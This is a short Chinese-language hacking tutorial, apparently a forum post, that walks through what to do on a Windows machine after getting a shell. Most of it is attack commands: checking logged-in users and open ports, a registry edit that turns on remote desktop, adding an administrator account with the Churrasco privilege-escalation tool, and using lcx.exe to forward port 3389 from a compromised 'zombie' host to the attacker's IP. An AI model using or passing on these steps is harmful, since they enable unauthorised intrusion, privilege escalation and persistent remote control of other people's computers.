// 后面是注解 命令中不需要后面的//
首先拿到shell后
以我个人的感觉应该探测下用户
query user // 判断下是否有用户登录和其他人登录过
其次在探测远程端口是否开放
netstat -an // 查看是否开放了3389端口
如果没有3389端口 那么判断下是否远程端口更改
首先开启下端口试试看
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
//开启一下3389 端口 尝试连接
tasklist /svc // 查找一下进程PID 找到termservice服务对应的PID
netstat -ano //通过查找进程pid判断端口所对应服务
找到端口后,远程登录。
如果判断内网或者无权限等情况
运用巴西烤肉进行提权
Churrasco.exe "net user 用户名 密码 /add && net localgroup administrators 用户名 /add"
最后用户有了远程端口有了,可是无聊连接上判断是否是开启了IP指定登录或是内网
内网情况建议执行lcx进行端口转发进行连接
先本地监听X端口 lcx.exe -listen X 3389
c:\recycler\lcx.exe -slave 自己的ip X 肉鸡IP 3389 LCX转发
c:\recycler\lcx.exe -slave 202.134.12.12 X 123.123.4.4 3389
最后如何利用lcx搭建跳板呢?留给各位同学的一个课题作业吧!
欢迎互相指教 大道三千,欢迎探讨!